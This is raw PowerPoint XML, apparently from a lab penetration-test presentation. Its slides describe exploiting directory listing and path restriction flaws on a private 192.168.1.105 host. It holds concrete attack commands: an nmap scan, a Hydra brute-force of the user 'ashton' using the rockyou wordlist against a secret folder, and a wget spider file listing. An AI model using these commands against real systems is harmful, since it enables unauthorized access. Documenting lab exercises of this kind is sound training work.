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36"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="280" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="298" r:id="rId9"/>
    <p:sldId id="296" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="297" r:id="rId12"/>
    <p:sldId id="279" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="278" r:id="rId16"/>
    <p:sldId id="266" r:id="rId17"/>
    <p:sldId id="267" r:id="rId18"/>
    <p:sldId id="268" r:id="rId19"/>
    <p:sldId id="269" r:id="rId20"/>
    <p:sldId id="270" r:id="rId21"/>
    <p:sldId id="271" r:id="rId22"/>
    <p:sldId id="272" r:id="rId23"/>
    <p:sldId id="273" r:id="rId24"/>
    <p:sldId id="274" r:id="rId25"/>
    <p:sldId id="275" r:id="rId26"/>
    <p:sldId id="276" r:id="rId27"/>
    <p:sldId id="291" r:id="rId28"/>
    <p:sldId id="292" r:id="rId29"/>
    <p:sldId id="293" r:id="rId30"/>
    <p:sldId id="285" r:id="rId31"/>
    <p:sldId id="286" r:id="rId32"/>
    <p:sldId id="294" r:id="rId33"/>
    <p:sldId id="295" r:id="rId34"/>
    <p:sldId id="277"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Perpetua" panose="02020502060401020303" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId41"/>
      <p:bold r:id="rId42"/>
      <p:italic r:id="rId43"/>
      <p:boldItalic r:id="rId44"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId45"/>
      <p:bold r:id="rId46"/>
      <p:italic r:id="rId47"/>
      <p:boldItalic r:id="rId48"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId49"/>
      <p:bold r:id="rId50"/>
      <p:italic r:id="rId51"/>
      <p:boldItalic r:id="rId52"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId53"/>
      <p:bold r:id="rId54"/>
      <p:italic r:id="rId55"/>
      <p:boldItalic r:id="rId56"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"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C2846D-6DAD-4640-8CFD-54061075D8CE}">
  <a:tblStyle styleId="{22C2846D-6DAD-4640-8CFD-54061075D8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guide orient="horz" pos="223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527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708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012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58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07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386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23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806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343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7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1.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1" name="Google Shape;1091;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2" name="Google Shape;1092;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AU"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
        <p:nvSpPr>
          <p:cNvPr id="1099" name="Google Shape;1099;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3365118" y="1276689"/>
            <a:ext cx="261029" cy="144694"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575140" y="148057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200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1105" name="Google Shape;1105;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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A278A7F7-D47E-4DFA-8867-CD4778BDB132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Exploitation: Improper Limitation of a Pathname to a Restricted </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Google Shape;1092;p61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFEC308B-66D0-46F8-985A-89314BC17B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876675" y="16330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Tools Used:</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Nmap</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Dirbuster</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Hydra</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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="99" name="Google Shape;1093;p61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F169B756-FFA1-423E-8EBC-2314ABC0EDE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609571" y="952466"/>
            <a:ext cx="533372" cy="621318"/>
            <a:chOff x="457188" y="1264307"/>
            <a:chExt cx="695400" cy="809956"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="Google Shape;1094;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D9D2E8E-D5A3-455C-9CF5-66C34DBBFE3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457188" y="1264307"/>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01" name="Google Shape;1095;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE350E7E-90D4-4256-95A9-A00FBAC67E22}"/>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96;p61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E8898F0-0B24-4103-9570-458BC070B32B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3381356" y="1040303"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="103" name="Google Shape;1097;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41733B71-AF3E-4431-82F8-10DAB9B43B5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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4" name="Google Shape;1098;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{434F3DB9-2B75-4FE6-8299-0ECE752F2CD7}"/>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100;p61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7E4ED36-C893-4468-9DB6-FF61422F68B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3648450" y="16330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Host located with Nmap</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Folders discovery with Dirbuster</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Brute-force password discovery with Hydra</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="106" name="Google Shape;1101;p61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{976AE6EC-AEEF-4020-AA34-FD109C04478A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6286481" y="1041053"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107" name="Google Shape;1102;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E6A3476-2109-4687-9238-C476E9381950}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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08" name="Google Shape;1103;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B057ED0-39BA-4836-967F-B522F02F1558}"/>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105;p61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8F20035-04A8-4826-AAA7-BC0203517903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553575" y="16337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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Nmap</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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap -sS -A 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="8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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Dirbuster</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AU" sz="800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rockyou.tx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> -s 80 -f -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 192.168.1.105 http-get /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/secret/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> &gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110" name="Google Shape;1106;p61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D16184E3-4F48-4475-B6D7-13A9285019D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6819853" y="2347594"/>
            <a:ext cx="1505625" cy="1067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AU" dirty="0"/>
              <a:t>Exploitation: Directory Listing Enabled on Apache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;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2" name="Google Shape;1092;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AU"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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575140" y="148057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200" dirty="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58" name="Group 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7640045E-940F-497B-AC84-2FB832041EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="274320" y="574675"/>
            <a:ext cx="8595360" cy="3993961"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8595600" cy="3994744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Shape 253">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{756ED4B4-8D68-4A77-BF82-CA20BAAA03FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8595600" cy="10200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="8595600" h="10200">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8595600" y="10200"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:rou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0" name="Shape 260">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED9A71F-2E2B-4846-83ED-894613F82C73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="449880" y="840495"/>
              <a:ext cx="2428541" cy="3154200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="2428541" h="3154200">
                  <a:moveTo>
                    <a:pt x="20" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2023762" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2247304" y="0"/>
                    <a:pt x="2428520" y="181216"/>
                    <a:pt x="2428520" y="404758"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2428541" y="3154180"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2428541" y="3154191"/>
                    <a:pt x="2428531" y="3154200"/>
                    <a:pt x="2428520" y="3154200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="404778" y="3154200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181237" y="3154200"/>
                    <a:pt x="20" y="2972983"/>
                    <a:pt x="20" y="2749442"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="15"/>
                    <a:pt x="2" y="10"/>
                    <a:pt x="6" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="2"/>
                    <a:pt x="15" y="0"/>
                    <a:pt x="20" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F3F3F3"/>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1" name="Rectangle 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C54446-A10F-4D50-9AC1-31FE11DD18C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1026436"/>
              <a:ext cx="1678290"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Tools</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="30"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&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="30"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Processes</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62" name="Rectangle 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FE8E38D-252E-4D60-9FF5-3007B984ECAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1235987"/>
              <a:ext cx="2466357" cy="237529"/>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Running</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bash</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command</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to</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63" name="Rectangle 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEAEC4B2-9DD8-42CA-A7FC-56F9A9D8837D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1512211"/>
              <a:ext cx="973124"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get</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file</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list:</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64" name="Rectangle 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A14C16-7E66-4134-9186-F67D3083F78B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1788436"/>
              <a:ext cx="1713356"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wget</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-r</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-np</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--spider</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65" name="Rectangle 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37BDAFA1-42F4-4014-84E2-DC560FACF164}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2051700" y="2064662"/>
              <a:ext cx="600779"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grep</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66" name="Rectangle 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECE2BC35-7A44-4A60-B4D0-469DF0F3583E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="2064662"/>
              <a:ext cx="1889698"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192.168.1.105/</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2&gt;&amp;1</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67" name="Rectangle 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACBC266D-69FA-4F34-80AF-EC71DD6A8A09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1606083" y="2340887"/>
              <a:ext cx="1017717"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grep</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-v</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-e</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68" name="Rectangle 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B8DD2D-A074-4098-931D-C3EA455C0451}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="2340887"/>
              <a:ext cx="1297026"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192.168.1.105</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69" name="Rectangle 68">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3BE3E10-D10D-467C-B1C1-0759FAF79579}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="2617111"/>
              <a:ext cx="1887671"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"Remote</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file"</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uniq</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&gt;</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70" name="Rectangle 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67919E47-6A17-4AD8-85D3-2E7D265DA516}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1606083" y="2893337"/>
              <a:ext cx="285795"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.txt</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71" name="Rectangle 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42C4822-DB43-4A61-97B7-3212711A43B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="2893337"/>
              <a:ext cx="1297026"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192.168.1.105</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72" name="Rectangle 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32F442A3-ACB3-4C34-8715-458BDF357BBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1555246" y="3169561"/>
              <a:ext cx="213637"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Or</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73" name="Rectangle 72">
              <a:extLst>
